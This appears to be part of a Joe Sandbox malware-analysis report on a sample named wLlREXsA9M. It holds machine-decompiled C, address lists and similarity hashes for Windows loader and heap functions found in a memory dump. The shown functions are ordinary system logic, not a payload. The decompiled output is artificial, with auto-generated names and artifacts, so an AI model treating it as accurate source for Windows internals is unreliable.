				if(( *_t146 & 0x00000001) == 0) {
					_t213 = 0x7ffe0384;
				} else {
					_t205 = L328A3C40();
					_t213 = 0x7ffe0384;
					if(_t205 == 0) {
						_t206 = 0x7ffe0384;
					} else {
						_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					L3291FC01(_t280 - 0x43c,  *_t206 & 0x000000ff);
				}
				if(_t266 == 0 || _t266 == 0xffffffff) {
					_t267 = 0xc000000d;
					goto L16;
				} else {
					 *(_t280 - 0x42c) =  *(_t280 - 0x430) & 0x00001000;
					_t150 = E3292314A(_t266, _t280 - 0x45c);
					if(_t150 >= 0 ||  *(_t280 - 0x42c) == _t271) {
						_t150 = E32923592(_t266, _t280 - 0x210, "true");
						if(_t150 >= 0) {
							if( *((intOrPtr*)(_t280 - 0x210)) == 0x5a4d) {
								_t269 =  *((intOrPtr*)(_t280 - 0x1d4));
								if( *(_t280 - 0x42c) == _t271) {
									L22:
									_t150 = E32923592( *((intOrPtr*)(_t280 - 0x428)), _t280 - 0x1d0, "true");
									if(_t150 >= 0) {
										if( *((intOrPtr*)(_t280 - 0x1d0)) != 0x4550) {
											goto L15;
										} else {
											if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x10b) {
												if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x20b ||  *((intOrPtr*)(_t280 - 0x1cc)) != 0x200 &&  *((intOrPtr*)(_t280 - 0x1cc)) != 0x8664) {
													goto L15;
												} else {
													if( *((intOrPtr*)(_t280 - 0x14c)) <= 2 ||  *((intOrPtr*)(_t280 - 0x134)) == _t271) {
														goto L30;
													} else {
														_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
														if(_t230 == 0 || _t230 < 0x88) {
															goto L15;
														} else {
															_t216 =  *((intOrPtr*)(_t280 - 0x138));
															goto L43;
														}
													}
												}
											} else {
												_t201 =  *((intOrPtr*)(_t280 - 0x1cc));
												if(_t201 == 0x14c || _t201 == 0x1c0 || _t201 == 0x1c2 || _t201 == 0x1c4) {
													if( *((intOrPtr*)(_t280 - 0x15c)) > 2) {
														if( *((intOrPtr*)(_t280 - 0x144)) == _t271) {
															goto L30;
														} else {
															_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
															if(_t230 == 0 || _t230 < 0x78) {
																goto L15;
															} else {
																_t216 =  *((intOrPtr*)(_t280 - 0x148));
																L43:
																if(_t216 != 0) {
																	_t167 =  *(_t280 - 0x1ca);
																	if(_t167 != 0) {
																		_t273 = (_t167 & 0x0000ffff) * 0x28;
																		if((_t230 & 0x0000ffff) + 0x18 + (_t167 & 0x0000ffff) * 0x28 + _t269 <=  *((intOrPtr*)(_t280 - 0x45c))) {
																			_t147 = L328A5D90(_t230,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t273);
																			 *(_t280 - 0x420) = _t147;
																			 *(_t280 - 0x448) = _t147;
																			if(_t147 != 0) {
																				_t274 =  *(_t280 - 0x420);
																				_t267 = E32923592( *((intOrPtr*)(_t280 - 0x428)), _t274, _t273);
																				 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																				if(_t267 < 0) {
																					L59:
																					_t147 =  *(_t280 - 0x420);
																					goto L60;
																				} else {
																					_t232 = _t274;
																					 *(_t280 - 0x438) = _t274;
																					_t258 = 0;
																					_t275 =  *(_t280 - 0x1ca) & 0x0000ffff;
																					if(_t275 != 0) {
																						while(_t216 < _t232[0xc] || _t216 >= _t232[0x10] + _t232[0xc]) {
																							_t232 =  &(_t232[0x28]);
																							_t258 = _t258 + 1;
																							if(_t258 < _t275) {
																								continue;
																							}
																							break;
																						}
																						 *(_t280 - 0x438) = _t232;
																					}
																					if(_t258 < _t275) {
																						_t278 = _t232[0x14] - _t232[0xc] + _t216;
																						if(_t232[0x14] - _t232[0xc] + _t216 == 0) {
																							goto L58;
																						} else {
																							_t217 =  *((intOrPtr*)(_t280 - 0x428));
																							_t267 = L32923C37(_t217, _t278);
																							 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																							if(_t267 < 0) {
																								goto L59;
																							} else {
																								if( *((intOrPtr*)(_t280 + 0xc)) != 3) {
																									L73:
																									 *((short*)(_t280 - 0x424)) = 0;
																									_t260 = _t217;
																									_t267 = E3289E9A0(0, _t217,  *((intOrPtr*)(_t280 - 0x45c)), _t278, _t280 - 0x1d0,  *(_t280 - 0x438),  *((intOrPtr*)(_t280 - 0x440)),  *((intOrPtr*)(_t280 + 0xc)), _t280 - 0x418,  *((intOrPtr*)(_t280 - 0x450)),  *((intOrPtr*)(_t280 - 0x44c)),  *(_t280 - 0x430), _t280 - 0x424);
																									 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																									if(_t267 < 0) {
																										goto L59;
																									} else {
																										_t235 =  *((intOrPtr*)(_t280 - 0x434));
																										if(_t235 == 0) {
																											goto L59;
																										} else {
																											_t182 =  *((intOrPtr*)(_t280 - 0x424));
																											_t271 = 0;
																											if( *((intOrPtr*)(_t280 - 0x424)) != 0) {
																												 *((intOrPtr*)(_t280 - 0x468)) = _t280 - 0xc8;
																												 *((short*)(_t280 - 0x46a)) = 0xac;
																												_t267 = E328B5A40(_t260, _t182 & 0x0000ffff, _t280 - 0x46c, 2, 0);
																												 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																												if(_t267 < 0) {
																													goto L85;
																												} else {
																													_t218 = _t280 - 0xc8;
																													_t239 = _t218 + 2;
																													do {
																														_t185 =  *_t218;
																														_t218 = _t218 + 2;
																													} while (_t185 != 0);
																													_t220 = _t218 - _t239 >> 1;
																													_t235 =  *((intOrPtr*)(_t280 - 0x434));
																													goto L81;
																												}
																											} else {
																												_t220 = 0;
																												L81:
																												 *(_t280 - 4) = _t271;
																												if(_t220 >=  *_t235) {
																													L84:
																													 *_t235 = _t220 + 1;
																													_t267 = 0xc0000023;
																													 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000023;
																													 *(_t280 - 4) = 0xfffffffe;
																													L85:
																													_t147 =  *(_t280 - 0x420);
																													goto L61;
																												} else {
																													_t187 =  *((intOrPtr*)(_t280 - 0x444));
																													if( *((intOrPtr*)(_t280 - 0x444)) == 0) {
																														goto L84;
																													} else {
																														_t279 = _t220 + _t220;
																														E328D88C0(_t187, _t280 - 0xc8, _t279);
																														_t120 = _t220 + 1; // 0x1
																														 *((intOrPtr*)( *((intOrPtr*)(_t280 - 0x434)))) = _t120;
																														 *((short*)(_t279 +  *((intOrPtr*)(_t280 - 0x444)))) = 0;
																														 *(_t280 - 4) = 0xfffffffe;
																														goto L59;
																													}
																												}
																											}
																										}
																									}
																								} else {
																									 *((short*)(_t280 - 0x418)) = 0;
																									_t193 =  *( *((intOrPtr*)(_t280 - 0x440)) + 8) & 0x0000ffff;
																									_t243 =  *(_t280 - 0x430);
																									if(( *(_t280 - 0x430) & 0x00000020) == 0) {
																										_t267 = E3289A2E0(0, 0, _t193, _t243, _t280 - 0x418);
																										 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																										if(_t267 >= 0 ||  *(_t280 - 0x42c) == 0) {
																											goto L73;
																										} else {
																											goto L59;
																										}
																									} else {
																										 *((short*)(_t280 - 0x418)) = 1;
																										 *((short*)(_t280 - 0x414)) = 0;
																										goto L73;
																									}
																								}
																							}
																						}
																						goto L93;
																					} else {
																						L58:
																						_t267 = 0xc000007b;
																						 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																						goto L59;
																					}
																				}
																			} else {
																				_t267 = 0xc0000017;
																				 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000017;
																				L60:
																				_t271 = 0;
																			}
																		} else {
																			_t271 = 0;
																			goto L46;
																		}
																	} else {
																		L46:
																		_t267 = 0xc000007b;
																		 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																		_t147 = _t271;
																	}
																	L61:
																	_t213 = 0x7ffe0384;
																	goto L62;
																} else {
																	_t150 = 0xc0000089;
																}
															}
														}
													} else {
														L30:
														_t267 = 0xc0000089;
														goto L16;
													}
												} else {
													goto L15;
												}
											}
										}
									}
								} else {
									if(E328894A3(_t269, 0xf8, _t280 - 0x448) < 0 || _t269 > 0x10000000) {
										goto L15;
									} else {
										_t204 = _t269 + 0xf8;
										if(_t204 <= _t269 || _t204 >=  *((intOrPtr*)(_t280 - 0x45c))) {
											goto L15;
										} else {
											goto L22;
										}
									}
								}
							} else {
								L15:
								_t267 = 0xc000007b;
								L16:
								 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
								_t147 = _t271;
								L62:
								if(_t147 != 0) {
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t271, _t147);
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(L328A3C40() == 0) {
									_t149 = 0x7ffe0385;
								} else {
									_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(( *_t149 & 0x00000001) != 0) {
									if(L328A3C40() != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										_t267 =  *((intOrPtr*)(_t280 - 0x41c));
									}
									L3291FC01(_t280 - 0x464,  *_t213 & 0x000000ff);
								}
								_t150 = _t267;
							}
						}
					}
				}
				L93:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 - 0x10));
				return _t150;
			}

0x32923608
0x3292360d
0x32923612
0x32923617
0x3292361d
0x3292361f
0x32923628
0x32923631
0x3292363a
0x32923643
0x3292364c
0x32923654
0x32923655
0x3292365c
0x3292365e
0x3292365f
0x32923666
0x32923670
0x32923672
0x32923673
0x3292367a
0x32923681
0x3292368f
0x32923699
0x329236a8
0x329236ba
0x329236aa
0x329236b3
0x329236b3
0x329236c2
0x329236f4
0x329236c4
0x329236c4
0x329236c9
0x329236d0
0x329236e2
0x329236d2
0x329236db
0x329236db
0x329236ed
0x329236ed
0x329236fb
0x32923be3
0x00000000
0x3292370a
0x32923715
0x32923723
0x3292372a
0x32923745
0x3292374c
0x3292375e
0x32923772
0x3292377e
0x329237b1
0x329237c5
0x329237cc
0x329237dc
0x00000000
0x329237de
0x329237ea
0x32923862
0x00000000
0x32923886
0x3292388d
0x00000000
0x32923897
0x32923897
0x329238a1
0x00000000
0x329238b5
0x329238b5
0x00000000
0x329238b5
0x329238a1
0x3292388d
0x329237ec
0x329237ef
0x329237f9
0x32923820
0x32923832
0x00000000
0x32923834
0x32923834
0x3292383e
0x00000000
0x3292384e
0x3292384e
0x329238bb
0x329238bd
0x329238c9
0x329238d3
0x329238ea
0x329238fd
0x3292390f
0x32923914
0x3292391a
0x32923922
0x32923932
0x32923950
0x32923952
0x3292395a
0x3292399d
0x3292399d
0x00000000
0x3292395c
0x3292395c
0x3292395e
0x32923964
0x32923966
0x3292396f
0x32923971
0x32923980
0x32923983
0x32923986
0x00000000
0x00000000
0x00000000
0x32923986
0x32923988
0x32923988
0x32923990
0x329239f0
0x329239f2
0x00000000
0x329239f4
0x329239f6
0x32923a03
0x32923a05
0x32923a0d
0x00000000
0x32923a0f
0x32923a13
0x32923a73
0x32923a75
0x32923ab9
0x32923ac2
0x32923ac4
0x32923acc
0x00000000
0x32923ad2
0x32923ad2
0x32923ada
0x00000000
0x32923ae0
0x32923ae0
0x32923ae7
0x32923aec
0x32923af8
0x32923b03
0x32923b1d
0x32923b1f
0x32923b27
0x00000000
0x32923b29
0x32923b29
0x32923b2f
0x32923b32
0x32923b32
0x32923b35
0x32923b38
0x32923b3f
0x32923b41
0x00000000
0x32923b41
0x32923aee
0x32923aee
0x32923b47
0x32923b47
0x32923b4c
0x32923b8f
0x32923b92
0x32923b94
0x32923b99
0x32923b9f
0x32923ba6
0x32923ba6
0x00000000
0x32923b4e
0x32923b4e
0x32923b56
0x00000000
0x32923b58
0x32923b58
0x32923b64
0x32923b6c
0x32923b75
0x32923b7f
0x32923b83
0x00000000
0x32923b83
0x32923b56
0x32923b4c
0x32923aec
0x32923ada
0x32923a15
0x32923a17
0x32923a24
0x32923a28
0x32923a31
0x32923a5a
0x32923a5c
0x32923a64
0x00000000
0x00000000
0x00000000
0x00000000
0x32923a33
0x32923a36
0x32923a3f
0x00000000
0x32923a3f
0x32923a31
0x32923a13
0x32923a0d
0x00000000
0x32923992
0x32923992
0x32923992
0x32923997
0x00000000
0x32923997
0x32923990
0x32923924
0x32923924
0x32923929
0x329239a3
0x329239a3
0x329239a3
0x329238ff
0x329238ff
0x00000000
0x329238ff
0x329238d5
0x329238d5
0x329238d5
0x329238da
0x329238e0
0x329238e0
0x329239a5
0x329239a5
0x00000000
0x329238bf
0x329238bf
0x329238bf
0x329238bd
0x3292383e
0x32923822
0x32923822
0x32923822
0x00000000
0x32923822
0x00000000
0x00000000
0x00000000
0x329237f9
0x329237ea
0x329237dc
0x32923780
0x32923795
0x00000000
0x3292379f
0x3292379f
0x329237a7
0x00000000
0x00000000
0x00000000
0x00000000
0x329237a7
0x32923795
0x32923760
0x32923760
0x32923760
0x32923765
0x32923765
0x3292376b
0x329239aa
0x329239ac
0x329239b9
0x329239be
0x329239be
0x329239cb
0x32923bed
0x329239d1
0x329239da
0x329239df
0x329239df
0x32923bf5
0x32923bfe
0x32923c09
0x32923c0f
0x32923c0f
0x32923c1e
0x32923c1e
0x32923c23
0x32923c23
0x3292375e
0x3292374c
0x3292372a
0x32923c25
0x32923c28
0x32923c34

Strings

LdrpResSearchResourceHandle Enter, xrefs: 32923666
PE, xrefs: 329237D2
LdrpResSearchResourceHandle Exit, xrefs: 32923681

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: e9433156af89192c0b996ac3d6750c170739e30397603569ed59996ce0d108ca
Instruction ID: c07856b552ee5c89d09633c32cb90a38f8b962acfc10ac3f7c5726b74e803181
Opcode Fuzzy Hash: e9433156af89192c0b996ac3d6750c170739e30397603569ed59996ce0d108ca
Instruction Fuzzy Hash: 89F161B9A0032C8FDB24DF18CC90BD9B3B9AF48754F4480E9DA09A7245DB719E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 32891380 Relevance: 4.1, Strings: 3, Instructions: 385
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E32891380(signed int __ecx, unsigned int __edx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t167;
				signed int _t176;
				signed short _t181;
				intOrPtr _t182;
				signed int _t184;
				signed int _t185;
				signed int _t189;
				intOrPtr _t192;
				signed int _t193;
				char _t195;
				signed int _t198;
				signed int _t204;
				void* _t208;
				signed int _t209;
				signed int _t211;
				short _t218;
				intOrPtr _t219;
				signed short _t226;
				signed short _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				intOrPtr _t236;
				intOrPtr _t246;
				signed int _t250;
				signed int _t253;
				signed int _t260;
				signed int _t262;
				void* _t264;
				intOrPtr* _t265;
				signed char _t267;
				signed char _t268;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t287;
				void* _t288;
				unsigned int _t296;
				void* _t299;
				signed int _t303;
				signed short _t306;
				signed short* _t307;
				signed int _t309;
				char _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				void* _t317;
				signed char _t318;
				signed short* _t327;
				signed int _t329;
				signed int _t330;
				signed short* _t331;
				signed int _t333;

				_t167 = _a12;
				_t260 = __ecx;
				_v24 = __edx;
				_t331 = _a4;
				_v12 = _t167;
				if(_t167 >  *((intOrPtr*)(__ecx + 0x5c))) {
					L7:
					return 0;
				}
				_v5 = _t331[1];
				_t327 = _t331 + ( *_t331 & 0x0000ffff) * 8;
				if((( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t327[1]) & 0x00000001) != 0) {
					goto L7;
				}
				if( *(__ecx + 0x4c) != 0) {
					 *_t327 =  *_t327 ^  *(__ecx + 0x50);
					if(_t327[1] != (_t327[0] ^ _t327[1] ^  *_t327)) {
						_push(__ecx);
						E3294D646(__ecx, __ecx, _t327, _t327, _t331, __eflags);
					}
				}
				_t262 =  *_t327 & 0x0000ffff;
				_t176 = ( *_t331 & 0x0000ffff) + _t262;
				_v28 = _t176;
				if(_t176 < _v12) {
					__eflags =  *(_t260 + 0x4c);
					if( *(_t260 + 0x4c) != 0) {
						_t327[1] = _t327[0] ^ _t327[1] ^  *_t327;
						 *_t327 =  *_t327 ^  *(_t260 + 0x50);
					}
					goto L7;
				}
				_t181 = _t327[4];
				_t306 = _t327[6];
				_v20 = _t181;
				_v16 = _t306;
				_t182 =  *((intOrPtr*)(_t181 + 4));
				_t307 =  &(_t327[4]);
				if( *_t306 == _t182) {
					__eflags =  *_v16 - _t307;
					_t333 = _a4;
					if( *_v16 != _t307) {
						goto L6;
					}
					 *((intOrPtr*)(_t260 + 0x74)) =  *((intOrPtr*)(_t260 + 0x74)) - _t262;
					_t309 =  *(_t260 + 0xb4);
					__eflags = _t309;
					if(_t309 == 0) {
						L17:
						_t265 = _v16;
						_t184 = _v20;
						 *_t265 = _t184;
						 *((intOrPtr*)(_t184 + 4)) = _t265;
						__eflags = _t327[1] & 0x00000008;
						if((_t327[1] & 0x00000008) != 0) {
							_t185 = E3288F5C7(_t260, _t327);
							__eflags = _t185;
							if(_t185 != 0) {
								goto L18;
							}
							E3288F113(_t260, _t327,  *_t327 & 0x0000ffff, 1);
							goto L7;
						}
						L18:
						_t267 = _t327[1];
						_t311 = 0;
						__eflags = _t267 & 0x00000004;
						if((_t267 & 0x00000004) == 0) {
							L24:
							_t268 =  *((intOrPtr*)(_t333 + 7));
							_t329 = ( *_t333 & 0x0000ffff) << 3;
							_v20 = _t327[1];
							__eflags = _t268 - 5;
							if(_t268 == 5) {
								_t270 =  *(_t260 + 0x54) & 0x0000ffff ^  *(_t333 + 4) & 0x0000ffff;
							} else {
								__eflags = _t268 & 0x00000040;
								if((_t268 & 0x00000040) != 0) {
									_t270 =  *(_t333 + 4 + (_t268 & 0x3f) * 8) & 0x0000ffff;
								} else {
									__eflags = (_t268 & 0x0000003f) - 0x3f;
									if((_t268 & 0x0000003f) == 0x3f) {
										__eflags = _t268;
										if(_t268 >= 0) {
											__eflags =  *(_t260 + 0x4c) - _t311;
											if( *(_t260 + 0x4c) == _t311) {
												_t226 =  *_t333 & 0x0000ffff;
											} else {
												_t229 =  *_t333;
												__eflags =  *(_t260 + 0x4c) & _t229;
												if(( *(_t260 + 0x4c) & _t229) != 0) {
													_t229 = _t229 ^  *(_t260 + 0x50);
													__eflags = _t229;
												}
												_t226 = _t229 & 0x0000ffff;
											}
										} else {
											_t296 = _t333 >> 0x00000003 ^  *_t333 ^  *0x32986964 ^ _t260;
											__eflags = _t296;
											if(_t296 == 0) {
												_t231 = _t333 - (_t296 >> 0xd);
												__eflags = _t231;
												_t311 =  *_t231;
											}
											_t226 =  *((intOrPtr*)(_t311 + 0x14));
										}
										_t270 =  *(_t333 + (_t226 & 0xffff) * 8 - 4);
									} else {
										_t270 = _t268 & 0x3f;
										__eflags = _t270;
									}
								}
							}
							_t312 = _v12;
							_t330 = _t329 - _t270;
							_t271 = _v28;
							_t189 = _t271 - _t312;
							__eflags = _t189 - 2;
							if(_t189 <= 2) {
								_t312 = _t271;
								_v12 = _t312;
							}
							_t272 = 2;
							__eflags = _t272 - _t189;
							asm("sbb ecx, ecx");
							__eflags = _v5 & 0x00000002;
							_v16 = _t272 & _t189;
							if((_v5 & 0x00000002) != 0) {
								_t274 =  *_t333 & 0x0000ffff;
								 *((intOrPtr*)(_t333 + _t312 * 8 - 8)) =  *((intOrPtr*)(_t333 + _t274 * 8 - 8));
								 *((intOrPtr*)(_t333 + _t312 * 8 - 4)) =  *((intOrPtr*)(_t333 + _t274 * 8 - 4));
								_t192 =  *[fs:0x30];
								__eflags =  *(_t192 + 0x68) & 0x00000800;
								if(( *(_t192 + 0x68) & 0x00000800) == 0) {
									goto L31;
								}
								_t218 = E32939AFE(_t260,  *((intOrPtr*)(_t333 + _t312 * 8 - 6)),  *_t333 & 0x0000ffff, _t312, "true");
								_t313 = _v12;
								 *((short*)(_t333 + _t313 * 8 - 6)) = _t218;
								goto L32;
							} else {
								_t219 =  *[fs:0x30];
								__eflags =  *(_t219 + 0x68) & 0x00000800;
								if(( *(_t219 + 0x68) & 0x00000800) != 0) {
									 *(_t333 + 3) = E32939AFE(_t260,  *(_t333 + 3) & 0x000000ff,  *_t333 & 0x0000ffff, _t312, "true");
								}
								L31:
								_t313 = _v12;
								L32:
								_t193 = _t313 & 0x0000ffff;
								_t276 = _t313 << 3;
								_v12 = _t193;
								 *_t333 = _t193;
								_t195 = _t276 - _a8;
								__eflags = _v16;
								if(_v16 == 0) {
									 *(_t333 + 2) =  *(_t333 + 2) | _v20;
									__eflags = _t195 - 0x3f;
									if(_t195 >= 0x3f) {
										 *((intOrPtr*)(_t276 + _t333 - 4)) = _t195;
										 *((char*)(_t333 + 7)) = 0x3f;
									} else {
										 *((char*)(_t333 + 7)) = _t195;
									}
									 *(_t333 + 4 + ( *_t333 & 0x0000ffff) * 8) =  *(_t260 + 0x54) ^  *_t333 & 0x0000ffff;
								} else {
									_t288 = _t276 + _t333;
									__eflags = _t195 - 0x3f;
									if(_t195 >= 0x3f) {
										 *((intOrPtr*)(_t288 - 4)) = _t195;
										 *((char*)(_t333 + 7)) = 0x3f;
									} else {
										 *((char*)(_t333 + 7)) = _t195;
									}
									_t318 =  *((intOrPtr*)(_t333 + 6));
									_t211 =  *(_t260 + 0x40) & 0x00000040;
									_v28 = _t211;
									__eflags = _t318;
									if(_t318 == 0) {
										_t319 = _t260;
									} else {
										_t211 = _v28;
										_t319 = (_t333 & 0xffff0000) - ((_t318 & 0x000000ff) << 0x10) + 0x10000;
										__eflags = (_t333 & 0xffff0000) - ((_t318 & 0x000000ff) << 0x10) + 0x10000;
									}
									_t211 = _t211 != 0;
									L3289170C(_t260, _t319, _t288, _v20, (_t211 & 0xffffff00 | _t211 != 0x00000000) & 0x000000ff, _v12, _v16);
								}
								__eflags = _v24 & 0x00000008;
								_t315 = _a8;
								if((_v24 & 0x00000008) != 0) {
									__eflags = _t315 - _t330;
									if(_t315 < _t330) {
										_t330 = _t315;
									}
									L3288EACC(_t260, _t333 + 8, _t330);
									goto L40;
								} else {
									__eflags =  *(_t260 + 0x40) & 0x00000040;
									if(( *(_t260 + 0x40) & 0x00000040) != 0) {
										_t287 = _t330 & 0x00000003;
										__eflags = _t287;
										if(_t287 != 0) {
											_push("true");
											_pop(_t208);
											_t209 = _t208 - _t287;
											__eflags = _t209;
											_t287 = _t209;
										}
										_t198 = _a8;
										_t317 = _t287 + _t330;
										__eflags = _t198 - _t317;
										if(_t198 <= _t317) {
											L41:
											__eflags =  *(_t260 + 0x40) & 0x00000020;
											if(( *(_t260 + 0x40) & 0x00000020) != 0) {
												 *((intOrPtr*)(_t333 + _t198 + 8)) = 0xabababab;
												 *((intOrPtr*)(_t333 + _t198 + 0xc)) = 0xabababab;
											}
											 *(_t333 + 2) = (_v24 >> 0x00000004 ^  *(_t333 + 2)) & 0x0000001f ^ _v24 >> 0x00000004;
											return 1;
										} else {
											_t204 = _t198 - _t287 - _t330 & 0xfffffffc;
											__eflags = _t204;
											if(_t204 != 0) {
												E328E8140(_t333 + 8 + _t317, _t204, 0xbaadf00d);
											}
											goto L40;
										}
									}
									L40:
									_t198 = _a8;
									goto L41;
								}
							}
						}
						_t233 = ( *_t327 & 0x0000ffff) * 8 - 0x10;
						_v16 = _t233;
						__eflags = _t267 & 0x00000002;
						if((_t267 & 0x00000002) != 0) {
							_push("true");
							_pop(_t299);
							__eflags = _t233 - _t299;
							if(_t233 > _t299) {
								_v16 = _t233;
							}
						}
						_t235 = E328E80A0( &(_t327[8]), _t233, 0xfeeefeee);
						_v20 = _t235;
						__eflags = _t235 - _v16;
						if(_t235 == _v16) {
							L23:
							_t311 = 0;
							__eflags = 0;
							goto L24;
						} else {
							_t236 =  *[fs:0x30];
							__eflags =  *(_t236 + 0xc);
							if( *(_t236 + 0xc) != 0) {
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
								E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							} else {
								_push("HEAP: ");
								E3288B910();
							}
							_push(_v20 + 0x10 + _t327);
							E3288B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t327);
							_t246 =  *[fs:0x30];
							__eflags =  *((char*)(_t246 + 2));
							if( *((char*)(_t246 + 2)) == 0) {
								goto L23;
							} else {
								 *0x329847a1 = 1;
								asm("int3");
								_t311 = 0;
								 *0x329847a1 = 0;
								goto L24;
							}
						}
					} else {
						_t303 =  *_t327 & 0x0000ffff;
						while(1) {
							__eflags = _t303 -  *((intOrPtr*)(_t309 + 4));
							if(_t303 <  *((intOrPtr*)(_t309 + 4))) {
								_t250 = _t303;
								break;
							}
							_t253 =  *_t309;
							__eflags = _t253;
							if(_t253 == 0) {
								_t250 =  *((intOrPtr*)(_t309 + 4)) - 1;
								break;
							} else {
								_t309 = _t253;
								continue;
							}
						}
						E328A036A(_t260, _t309, 1,  &(_t327[4]), _t250, _t303);
						goto L17;
					}
				}
				L6:
				_push(0);
				_push( *_v16);
				_push(_t182);
				_push(_t307);
				_t264 = 0xd;
				L32955FED(_t264, _t260);
				goto L7;
			}

0x32891388
0x3289138c
0x3289138e
0x32891392
0x32891396
0x3289139c
0x32891413
0x00000000
0x32891413
0x328913a1
0x328913a7
0x328913b8
0x00000000
0x00000000
0x328913be
0x328913c3
0x328913d0
0x328ef4c9
0x328ef4cc
0x328ef4cc
0x328913d0
0x328913d6
0x328913dc
0x328913de
0x328913e4
0x32891603
0x32891607
0x32891615
0x3289161b
0x3289161b
0x00000000
0x32891607
0x328913ea
0x328913ed
0x328913f0
0x328913f3
0x328913f6
0x328913fb
0x328913fe
0x3289141f
0x32891421
0x32891424
0x00000000
0x00000000
0x32891426
0x32891429
0x3289142f
0x32891431
0x3289145a
0x3289145a
0x3289145d
0x32891460
0x32891462
0x32891465
0x32891469
0x3289167e
0x32891683
0x32891685
0x00000000
0x00000000
0x328ef4e0
0x00000000
0x328ef4e0
0x3289146f
0x3289146f
0x32891472
0x32891474
0x32891477
0x328914c7
0x328914cd
0x328914d0
0x328914d3
0x328914d6
0x328914d9
0x328ef4f2
0x328914df
0x328914df
0x328914e2
0x328ef4ff
0x328914e8
0x328914ec
0x328914ee
0x328ef509
0x328ef50b
0x328ef530
0x328ef533
0x328ef544
0x328ef535
0x328ef535
0x328ef537
0x328ef53a
0x328ef53c
0x328ef53c
0x328ef53c
0x328ef53f
0x328ef53f
0x328ef50d
0x328ef51a
0x328ef51c
0x328ef51f
0x328ef526
0x328ef526
0x328ef528
0x328ef528
0x328ef52a
0x328ef52a
0x328ef54d
0x328914f4
0x328914f7
0x328914f7
0x328914f7
0x328914ee
0x328914e2
0x328914fa
0x328914fd
0x328914ff
0x32891504
0x32891506
0x32891509
0x328916a4
0x328916a6
0x328916a6
0x32891511
0x32891512
0x32891514
0x32891518
0x3289151c
0x3289151f
0x328916dd
0x328916e4
0x328916ec
0x328916f0
0x328916f6
0x328916fd
0x00000000
0x00000000
0x328ef564
0x328ef569
0x328ef56c
0x00000000
0x32891525
0x32891525
0x3289152b
0x32891532
0x328ef588
0x328ef588
0x32891538
0x32891538
0x3289153b
0x3289153b
0x32891540
0x32891543
0x32891546
0x3289154b
0x3289154e
0x32891552
0x328916b1
0x328916b4
0x328916b7
0x328ef590
0x328ef594
0x328916bd
0x328916bd
0x328916bd
0x328916ca
0x32891558
0x32891558
0x3289155a
0x3289155d
0x328ef59d
0x328ef5a0
0x32891563
0x32891563
0x32891563
0x32891569
0x3289156c
0x3289156f
0x32891572
0x32891574
0x328915ea
0x32891576
0x32891586
0x32891589
0x32891589
0x32891589
0x32891597
0x328915a4
0x328915a4
0x328915a9
0x328915ad
0x328915b0
0x32891690
0x32891692
0x32891708
0x32891708
0x3289169a
0x00000000
0x328915b6
0x328915b6
0x328915ba
0x328ef5ab
0x328ef5ab
0x328ef5ae
0x328ef5b0
0x328ef5b2
0x328ef5b3
0x328ef5b3
0x328ef5b5
0x328ef5b5
0x328ef5b7
0x328ef5ba
0x328ef5bd
0x328ef5bf
0x328915c3
0x328915c3
0x328915c7
0x328ef5ed
0x328ef5f1
0x328ef5f1
0x328915e2
0x00000000
0x328ef5c5
0x328ef5c9
0x328ef5c9
0x328ef5cc
0x328ef5de
0x328ef5de
0x00000000
0x328ef5cc
0x328ef5bf
0x328915c0
0x328915c0
0x00000000
0x328915c0
0x328915b0
0x3289151f
0x3289147c
0x32891483
0x32891486
0x32891489
0x328915ee
0x328915f0
0x328915f1
0x328915f3
0x328915fb
0x328915fb
0x328915f3
0x32891499
0x3289149e
0x328914a1
0x328914a4
0x328914c5
0x328914c5
0x328914c5
0x00000000
0x328914a6
0x328914a6
0x328914ac
0x328914b0
0x3289162e
0x32891637
0x328914b6
